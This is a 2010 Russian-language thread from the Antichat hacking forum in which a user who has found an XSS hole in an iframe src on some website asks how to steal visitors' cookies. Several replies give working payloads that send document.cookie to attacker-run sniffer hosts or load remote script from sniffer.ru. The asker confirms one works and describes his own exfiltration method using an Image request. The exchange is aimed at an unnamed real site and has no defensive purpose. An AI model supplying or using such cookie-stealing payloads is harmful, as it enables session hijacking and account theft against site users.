HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу XSS в IFRAME SRC. Как взять куки?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в IFRAME SRC. Как взять куки?
  #1  
Старый 18.05.2010, 17:31
TomskDiver
Новичок
Регистрация: 24.04.2008
Сообщений: 8
С нами: 9498694

Репутация: 0
По умолчанию XSS в IFRAME SRC. Как взять куки?
Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал Можно ли как-то красть куки через данную уязвимость?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 18.05.2010, 18:27
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию
Цитата:
Сообщение от TomskDiver  
Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал Можно ли как-то красть куки через данную уязвимость?
<iframe src="http://site.ru/sniffer.php?с='+document.cookie+'" style="display:none;"></iframe>
Последний раз редактировалось Redwood; 18.05.2010 в 18:46..
 
Ответить с цитированием

  #3  
Старый 18.05.2010, 18:35
TomskDiver
Новичок
Регистрация: 24.04.2008
Сообщений: 8
С нами: 9498694

Репутация: 0
По умолчанию
Цитата:
Сообщение от Redwood  
<iframe src="http://site.ru/sniffer.php='+document.cookie+'" style="display:none;"></iframe>
Как мне кажется у вас ошибка.
если после php оставить = то ничего не выводится.
если после php поставить например ?c= то выводится: c='+document.cookie+'

В src разве сработает document.cookie? Ведь надо писать что-то типа src="Javascript:blablabla document.cookie "
 
Ответить с цитированием

  #4  
Старый 18.05.2010, 18:38
IndigoMan
Новичок
Регистрация: 07.06.2008
Сообщений: 8
С нами: 9434573

Репутация: 0
По умолчанию
scr параметр зависим от твоих входных данных? если нет, то ты просто модифицировал код html и все...это даже не уязвимость получается.
 
Ответить с цитированием

  #5  
Старый 18.05.2010, 18:49
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию
Цитата:
Сообщение от TomskDiver  
В src разве сработает document.cookie? Ведь надо писать что-то типа src="javascript:blablabla document.cookie "
Сработает
Последний раз редактировалось Redwood; 19.05.2010 в 14:08..
 
Ответить с цитированием

  #6  
Старый 18.05.2010, 18:55
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами: 9083308

Репутация: 719
По умолчанию
Цитата:
<iframe src="javascript:x=document.createElement('script') ;x.src='http://sniffer.ru/xss.js';document.body.appendChild(x);" style="display:none;"></iframe>
попробуй так
 
Ответить с цитированием

  #7  
Старый 18.05.2010, 19:10
IndigoMan
Новичок
Регистрация: 07.06.2008
Сообщений: 8
С нами: 9434573

Репутация: 0
По умолчанию
и так работает
<iframe src="http://www.evilsite.com/?cookie=" + document. cookie style="display:none;"></iframe>
 
Ответить с цитированием

  #8  
Старый 19.05.2010, 07:27
TomskDiver
Новичок
Регистрация: 24.04.2008
Сообщений: 8
С нами: 9498694

Репутация: 0
По умолчанию
Redwood, IndigoMan - то как вы предложили не работает. Снифер будет выводить слова document. cookie, а не сами куки.
satana-fu - РЕСПЕКТ! Получилось. В дополнительном js файле делаю new Image() c src на снифер и всё работает.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Халявный интернет или как спрятаться надежнее чем VPN или SSH с цепочкой соксов. kodzero Статьи 20 06.08.2010 23:54
Халявный Интернет (для маленьких) stopxaker Статьи 91 20.04.2010 19:52
FAQ. Перед тем как задать вопрос. Fata1ex Skype, IRC, ICQ, Jabber и другие IM 1 04.11.2007 20:35
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.